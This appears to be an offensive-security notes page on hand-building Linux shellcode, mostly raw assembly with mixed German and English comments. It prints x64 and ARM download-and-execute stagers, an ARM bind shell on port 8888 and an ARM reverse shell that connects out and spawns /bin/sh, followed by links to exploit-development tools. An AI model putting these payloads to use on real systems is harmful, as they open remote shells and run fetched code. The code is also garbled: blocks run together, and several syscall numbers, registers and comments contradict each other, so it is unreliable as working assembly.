Why it matters in practice
Shell-Codes/Payloads Build Your Own (Linux Shellcoding) matters because it shapes how an operator scopes the work, chooses validation steps, prioritizes evidence and explains risk. The point is not to accumulate trivia; it is to understand which control boundary is in play and how that boundary can fail under realistic pressure.
This note keeps shell-codes/payloads build your own (linux shellcoding) tied to offensive workflow: what to observe, what to prove, what usually goes wrong, and which references remain useful once an assessment moves from planning into active validation.
Primary coverage
The items below mark the main workflows, concepts, tools and validation themes that repeatedly matter when working through shell-codes/payloads build your own (linux shellcoding).
- Shellcoding theory
- Generating shellcode with metasploit
- Building shellcode with assembly
- Shellcode assembler
- Compiler script
- Hex converter
- Building shellcode in c
- C shellcode
- Syscall table
- Exit shellcode in assembly
Selected public references
section .text global _start _start: ; URL of the file to download mov rdi, url ; Path where the file should be stored mov rsi, target_path ; download the file xor rdx, rdx ; Null-terminierte Zeichenkette mov rax, 2 ; system call number for open syscall ; Create or open file mov rdi, rax ; file descriptor mov rdx, 4096 ; buffer size mov rsi, buffer xor rax, rax ; read file syscall ; prepare a memory region for shellcode mov rdi, rsp ; pointer to the stack sub rdi, 4096 ; Verschieben um 4096 Bytes mov rsi, buffer mov rdx, rax ; length of the shellcode that was read mov rax, 9 ; system call number for mmap xor r10, r10 ; Flags (MAP_PRIVATE | MAP_ANONYMOUS) xor r8, r8 ; file descriptor (ignored) xor r9, r9 ; offset in file (ignored) syscall ; Shellcode in den Speicher kopieren mov rdi, rax ; Zieladresse mov rsi, buffer mov rdx, rax ; length of the shellcode xor rax, rax ; read file syscall ; execute shellcode mov rdi, rax ; Shellcode-Adresse xor rax, rax ; Exit-Code 0 call rdi ; Programm beenden xor edi, edi ; Exit-Code 0 mov rax, 60 ; system call number for exit syscall section .data url db "ftp://example.com/your_file.txt", 0 target_path db "/path/to/your_file.txt", 0 buffer times 4096 db 0
section .text global _start _start: ; URL of the file to download mov rdi, url ; Path where the file should be stored mov rsi, target_path ; download the file xor rdx, rdx ; Null-terminierte Zeichenkette mov rax, 2 ; system call number for open syscall ; Create or open file mov rdi, rax ; file descriptor mov rdx, 4096 ; buffer size mov rsi, buffer xor rax, rax ; read file syscall ; save file xor rdi, rdi ; file descriptor 0 (standard output) mov rdx, rax ; number of bytes read mov rsi, buffer mov rax, 1 ; system call number for write syscall ; Programm beenden xor edi, edi ; Exit-Code 0 mov rax, 60 ; system call number for exit syscall section .data url db "https://example.com/your_file.txt", 0 target_path db "/path/to/your_file.txt", 0 buffer times 4096 db 0
.section .text
.global _start
_start:
// Socket erstellen
mov r7, #2 // socketcall Syscall-Nummer
mov r0, #1 // AF_INET = 2
mov r1, #1 // SOCK_STREAM = 1
eor r2, r2, r2 // Protokolloptionen = 0
mov r8, r2 // copy of r2 for later use
mov r2, #41 // socketcall-Unterfunktion: socket = 41
swi #0 // execute syscall
// Binden des Sockets
mov r7, #2 // socketcall Syscall-Nummer
mov r0, r0 // Socket-file descriptor
ldr r1, =0x02000000 // IP address = 0.0.0.0 (INADDR_ANY)
ldrh r2, =0x8818 // port number = 8888 (0x22B8)
mov r3, #16 // address length = 16
mov r8, r3 // copy of r3 for later use
mov r3, #2 // socketcall-Unterfunktion: bind = 2
swi #0 // execute syscall
// Socket in den "Listening"-Modus versetzen
mov r7, #2 // socketcall Syscall-Nummer
mov r0, r0 // Socket-file descriptor
mov r1, r8 // address length
mov r8, r1 // copy of r1 for later use
mov r1, #4 // socketcall-Unterfunktion: listen = 4
swi #0 // execute syscall
// accept the incoming connection
mov r7, #2 // socketcall Syscall-Nummer
mov r0, r0 // Socket-file descriptor
ldr r1, =0x00ffff02 // pointer to a 4-byte buffer for the client IP
ldr r2, =0x22 // pointer to a 4-byte buffer for the client port number
mov r3, r8 // copy of address length for later use
mov r8, r3 // copy of r3 for later use
mov r3, #5 // socketcall-Unterfunktion: accept = 5
swi #0 // execute syscall
// Duplizieren von file descriptors for communication
mov r7, #63 // dup2 Syscall-Nummer
mov r0, r0 // original file descriptor (Socket)
mov r1, #0 // Ziel-file descriptor (Standard-Eingabe)
swi #0 // execute syscall
mov r0, r0 // original file descriptor (Socket)
mov r1, #1 // Ziel-file descriptor (Standard-Ausgabe)
swi #0 // execute syscall
mov r0, r0 // original file descriptor (Socket)
mov r1, #2 // Ziel-file descriptor (Standard-Fehler)
swi #0 // execute syscall
// execute a shell
ldr r7, =0x6e69622f // "/bin/sh" in ASCII laden
strb r7, [r0, #7] // insert null terminator
mov r7, #11 // execve Syscall-Nummer
mov r0, r0 // filename ("/bin/sh")
eor r1, r1, r1 // argv = NULL
eor r2, r2, r2 // Umgebungsvariable = NULL
swi #0 // execute syscall
// Programm beenden
mov r7, #1 // exit Syscall-Nummer
eor r0, r0, r0 // Exit-Code = 0
swi #0 // execute syscall.section .text
.global _start
_start:
// Socket erstellen
mov r7, #2 // socketcall Syscall-Nummer
mov r0, #2 // AF_INET = 2
mov r1, #1 // SOCK_STREAM = 1
eor r2, r2, r2 // Protokolloptionen = 0
mov r8, r2 // copy of r2 for later use
mov r2, #41 // socketcall-Unterfunktion: socket = 41
swi #0 // execute syscall
mov r4, r0 // Socket-file descriptor speichern
// connect to remote host
mov r7, #2 // socketcall Syscall-Nummer
mov r0, r4 // Socket-file descriptor
ldr r1, =0x0101017f // IP address = 127.1.1.1 (adjust as required)
ldrh r2, =0xbb80 // port number = 48000 (adjust as required)
mov r3, #16 // address length = 16
mov r8, r3 // copy of r3 for later use
mov r3, #3 // socketcall-Unterfunktion: connect = 3
swi #0 // execute syscall
// Duplizieren von file descriptors for communication
mov r7, #63 // dup2 Syscall-Nummer
mov r0, r4 // original file descriptor (Socket)
mov r1, #0 // Ziel-file descriptor (Standard-Eingabe)
swi #0 // execute syscall
mov r0, r4 // original file descriptor (Socket)
mov r1, #1 // Ziel-file descriptor (Standard-Ausgabe)
swi #0 // execute syscall
mov r0, r4 // original file descriptor (Socket)
mov r1, #2 // Ziel-file descriptor (Standard-Fehler)
swi #0 // execute syscall
// execute a shell
ldr r7, =0x6e69622f // "/bin/sh" in ASCII laden
strb r7, [r0, #7] // insert null terminator
mov r7, #11 // execve Syscall-Nummer
mov r0, r0 // filename ("/bin/sh")
eor r1, r1, r1 // argv = NULL
eor r2, r2, r2 // Umgebungsvariable = NULL
swi #0 // execute syscall
// Programm beenden
mov r7, #1 // exit Syscall-Nummer
eor r0, r0, r0 // Exit-Code = 0
swi #0 // execute syscall.section .text .global _start _start: @ URL of the file to download ldr r0, =url @ Path where the file should be stored ldr r1, =target_path @ download the file mov r2, #0 @ Null-terminierte Zeichenkette mov r7, #5 @ system call number for open svc 0 @ Create or open file mov r1, r0 @ file descriptor mov r2, #4096 @ buffer size ldr r0, =buffer mov r7, #0 @ read file svc 0 @ prepare a memory region for shellcode mov r1, sp @ pointer to the stack sub r1, #4096 @ Verschieben um 4096 Bytes ldr r2, =buffer mov r3, r0 @ length of the shellcode that was read mov r0, #192 @ system call number for mmap mov r7, #0 @ Flags (MAP_PRIVATE | MAP_ANONYMOUS) mov r8, #0 @ file descriptor (ignored) mov r9, #0 @ offset in file (ignored) svc 0 @ Shellcode in den Speicher kopieren mov r1, r0 @ Zieladresse ldr r2, =buffer mov r3, r0 @ length of the shellcode mov r0, #0 @ read file svc 0 @ execute shellcode mov r0, r1 @ Shellcode-Adresse mov r7, #0 @ Exit-Code 0 blx r0 @ Programm beenden mov r0, #0 @ Exit-Code 0 mov r7, #1 @ system call number for exit svc 0 .section .data url: .asciz "ftp://example.com/your_file.txt" target_path: .asciz "/path/to/your_file.txt" buffer: .space 4096, 0
.section .text
.global _start
_start:
@ URL of the file to download
ldr r0, =url
@ Path where the file should be stored
ldr r1, =target_path
@ download the file
mov r2, #0 @ Null-terminierte Zeichenkette
mov r7, #5 @ system call number for open
swi 0
@ Create or open file
mov r1, r0 @ file descriptor
mov r2, #4096 @ buffer size
ldr r0, =buffer
mov r7, #0 @ read file
swi 0
@ save file
mov r0, #1 @ file descriptor 1 (standard output)
mov r2, r1 @ number of bytes read
ldr r1, =buffer
mov r7, #1 @ system call number for write
swi 0
@ Programm beenden
mov r0, #0 @ Exit-Code 0
mov r7, #1 @ system call number for exit
swi 0
.section .data
url: .asciz "https://example.com/your_file.txt"
target_path: .asciz "/path/to/your_file.txt"
buffer: .space 4096, 0section .text
global _start
_start:
; open file
mov eax, 5 ; system call number for open
mov ebx, path_to_file
xor ecx, ecx ; Flags (O_RDONLY)
xor edx, edx ; Zugriffsrechte (ignoriert)
int 0x80
; file descriptor in EBX speichern
mov ebx, eax
; contents of the file buffer
mov eax, 3 ; system call number for read
mov ecx, ebx ; file descriptor
mov edx, buffer
mov esi, 4096 ; maximum length of content to read
int 0x80
; write the contents to standard output
mov eax, 4 ; system call number for write
xor ebx, ebx ; file descriptor 1 (standard output)
mov ecx, buffer
mov edx, eax ; number of bytes read
int 0x80
; Programm beenden
xor ebx, ebx ; Exit-Code 0
mov eax, 1 ; system call number for exit
int 0x80
section .data
path_to_file db "/path/to/file.txt", 0
buffer times 4096 db 0Selected public references
- pwntools Documentationdocs.pwntools.com/en/stable/
- gef-legacy.readthedocs.io ยท Latestgef-legacy.readthedocs.io/en/latest/
- pwndbgpwndbg.re/
- Shell-Stormshell-storm.org/
- Exploit Databaseexploit-db.com/